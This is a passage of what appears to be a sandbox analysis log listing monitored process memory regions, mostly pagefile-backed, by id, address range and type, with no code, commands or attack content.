= 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5170 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5171 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5172 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5173 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5174 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5175 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5176 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5177 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5178 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5179 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5180 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5181 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5182 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5183 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5184 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5185 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5186 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5187 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5188 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5189 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5190 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5191 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5192 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5193 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5194 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5195 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5196 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5197 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5198 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5199 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5200 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5201 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5202 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5203 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5204 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5205 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5206 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5207 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5208 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5209 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5210 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5211 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5212 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5213 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5214 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5215 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5216 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5217 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5218 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5219 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5220 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5221 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5222 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5223 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5224 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5225 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5226 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5227 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5228 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5229 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5230 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5231 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5232 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5233 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5234 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5235 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5236 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5237 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5238 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5239 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5240 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5241 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5242 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5243 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5244 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5245 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5246 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5247 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5248 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5249 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5250 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5251 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5252 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5253 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5254 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5255 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5256 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5257 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5258 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5259 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5260 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5261 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5262 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5263 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5264 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5265 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5266 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5267 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5268 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5269 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5270 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5271 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5272 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5273 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5274 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5275 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5276 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5277 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5278 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5279 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5280 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5281 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5282 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5283 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5284 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5285 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5286 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5287 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5288 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5289 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5290 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5291 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5292 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5293 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5294 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5295 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5296 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 5297 start_va = 0x64e0000 end_va = 0x64fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 5298 start_va = 0x6500000 end_va = 0x650dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006500000" filename = "" Region: id = 5299 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5300 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5301 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5302 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5303 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5304 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5305 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5306 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5307 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5308 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5309 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5310 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5311 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5312 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5313 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5314 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5315 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5316 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5317 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5318 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5319 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5320 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5321 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5322 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5323 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5324 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5325 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5326 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5327 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5328 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5329 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5330 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5331 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5332 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5333 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5334 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5335 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5336 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5337 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5338 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5339 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5340 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5341 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5342 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5343 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5344 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5345 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5346 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5347 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5348 start_va 